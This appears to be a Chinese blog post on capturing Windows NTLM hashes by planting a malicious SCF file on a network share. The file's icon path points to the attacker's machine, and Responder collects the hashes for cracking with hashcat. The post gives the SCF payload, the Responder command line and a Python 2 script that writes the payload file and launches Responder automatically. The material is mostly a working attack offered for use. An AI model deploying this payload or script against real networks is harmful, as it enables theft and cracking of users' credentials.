利用sfc文件构建网络渗透
收集哈希
SCF(Shell命令文件)文件可用于执行一组有限的操作,例如显示Windows桌面或打开Windows资源管理器,这并不是什么新鲜事。然而,一个SCF文件可以用来访问一个特定的UNC路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。
代码:
[Shell] Command=2 IconFile=\\攻击者的IP\share\pentestlab.ico [Taskbar] Command=ToggleDesktop
目标机IP:192.168.3.27
攻击者IP:192.168.3. 21
写入文件后保存为@table.scf
注:@的意思就是将其置顶
然后在攻击机里开启:responder -wrf –lm -v -I etho 看你的IP选择网络设备
然后将那个文件进行网络共享。只要有人浏览了该文件夹。那么就能获取受害者的hash
然后使用hashcat来跑就ok。我们可以用hashidentifier.py来判断Hash类型
——————————————————————————————————————
然后我觉得就这样发布感觉对不起自己,然后就用py写了个脚本。
首先我们来说说实现思路:
1.获取本机IP
2.在指定文件夹内生成*.scaf,并写入exp
3.执行responder -wrf –Im -v -I 网卡设备
实现代码:
import os import socket logo=""" _==/ i i \==_ /XX/ |\___/| \XX\ /XXXX\ |XXXXX| /XXXX\ |XXXXXX\_ _XXXXXXX_ _/XXXXXX| XXXXXXXXXXXxxxxxxxXXXXXXXXXXXxxxxxxxXXXXXXXXXXX |XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX| XXXXXX/^^^^"\XXXXXXXXXXXXXXXXXXXXX/^^^^^\XXXXXX |XXX| \XXX/^^\XXXXX/^^\XXX/ |XXX| \XX\ \X/ \XXX/ \X/ /XX/ "\ " \X/ " /" """ print logo def folders(): global losd global ip print '[+]Here we will first create a SCAF file .' print '[+]Please enter which file you want to create .' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) low = s.connect(('8.8.8.8', 80)) ip = s.getsockname()[0] print '[+]Get to local IP:{}'.format(ip) losd=raw_input('position:') if os.path.exists(losd) == True: print '[+]Folders exist' else: print '[-]Not Found Folders .' exit() folders() def scaf(): try: fw=open('{}/@table.scaf'.format(losd),'w') payload=''' [Shell] Command=2 IconFile=\\{}\share\pentestlab.ico [Taskbar] Command=ToggleDesktop '''.format(ip) fw.write(payload) print '[+]Generating SACF files successfully !' except Exception , g: print '[-]Error:',g try: usew=raw_input('Please enter the network device:') os.system('responder -wrf --lm -v -I {}'.format(usew)) except Exception ,l: print '[-]Error:',l scaf()
运行截图:
版权声明:本文为haq5201314原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。